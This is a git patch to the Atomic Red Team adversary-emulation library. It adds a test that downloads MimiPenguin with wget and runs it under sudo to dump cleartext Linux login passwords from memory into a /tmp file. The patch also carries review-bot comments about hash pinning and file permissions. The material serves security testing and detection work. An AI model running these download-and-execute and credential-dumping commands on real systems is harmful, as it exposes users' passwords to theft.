From 82df99e7c8addd8620d5ecbb1ca38b594bd28d8f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 9 Mar 2022 16:16:04 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/linux-index.md | 1 +
 atomics/Indexes/index.yaml | 67 +++++++++++++++
 atomics/T1003.007/T1003.007.md | 85 +++++++++++++++++++
 6 files changed, 156 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 1e582b39..0a6f7538 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 437ccce7..525ea1fa 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f6f7eabc..253ca895 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -146,6 +146,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
 - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
 - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+ - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
 - Atomic Test #1: Golden SAML [azure-ad]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 130436db..a467540a 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -54,6 +54,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
 - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
 - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+ - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
 - Atomic Test #1: Golden SAML [azure-ad]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e1077627..26376790 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6299,6 +6299,73 @@ credential-access: cleanup_command: 'rm -f "#{output_file}" ' + - name: Capture Passwords with MimiPenguin + auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c + description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux + systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions + of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin + will retrieve passwords from memory and output them to a specified file. \nSee + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007Test3.txt" + MimiPenguin_Location: + description: Path of MimiPenguin script + type: Path + default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" + dependency_executor_name: sh + dependencies: + - description: 'MimiPenguin script must exist on disk at specified location + (#{MimiPenguin_Location}) + +' + prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz + mkdir /tmp/mimipenguin + tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin + - description: 'Strings must be installed + +' + prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: 'sudo apt-get -y install binutils + +' + - description: 'Python2 must be installed + +' + prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install python2 \n" + - 
description: 'Libc-bin must be installed + +' + prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else + exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install libc-bin \n" + executor: + command: | + sudo #{MimiPenguin_Location} > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} > /dev/null + +' + name: bash + elevation_required: true T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index d2d5875d..c07b000b 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) +- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin) +
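Review bot: The get_prereq_command of the new MimiPenguin entry fetches `mimipenguin_2.0-release.tar.gz` with wget and the executor later runs the extracted script under `sudo`, yet nothing checks what was downloaded; the three prereq commands are also not chained, so `tar` runs even when the download failed, and `mkdir /tmp/mimipenguin` without `-p` errors when the directory is left over from an earlier run. An archive that is going to be executed as root should at least be pinned to its release hash and the steps chained: `wget -O "/tmp/mimipenguin.tar.gz" "https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz" && echo "<sha256 of the 2.0 release archive>  /tmp/mimipenguin.tar.gz" | sha256sum -c - && mkdir -p /tmp/mimipenguin && tar -xzf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin`. The expected hash is worth stating in the description too, so a reader can confirm the artifact before granting it sudo. Since index.yaml is generated, the change presumably belongs in the technique's own YAML that this index is built from.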
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed" +
+
+
+## Atomic Test #3 - Capture Passwords with MimiPenguin
+MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
+Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
+See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
+See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt|
+| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
+
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
+
+```bash
+sudo #{MimiPenguin_Location} > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{output_file} > /dev/null
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
+##### Check Prereq Commands:
+```sh
+if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+mkdir /tmp/mimipenguin
+tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+```
+##### Description: Strings must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install binutils
+```
+##### Description: Python2 must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install python2
+```
+##### Description: Libc-bin must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install libc-bin
+```
+
+
+
+
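Review bot: The attack command `sudo #{MimiPenguin_Location} > #{output_file}` writes whatever cleartext passwords MimiPenguin recovers into `/tmp/T1003.007Test3.txt` with the invoking user's default umask, which on most distributions leaves a world-readable file of live credentials in a shared directory until cleanup, and the following `cat` then copies those credentials into the runner's console output and any log that captures it. Both input paths are also unquoted, so a custom `output_file` or `MimiPenguin_Location` containing spaces splits the command. I would tighten the executor to `umask 077`, `sudo "#{MimiPenguin_Location}" > "#{output_file}"`, and keep the `cat` only with a warning in the description that recovered passwords will appear in test output. A smaller point: the stray `--version` argument in `command -v strings --version` (and the python2/ldd checks) does nothing useful and its handling differs between shells, so `command -v strings >/dev/null` is the clearer check.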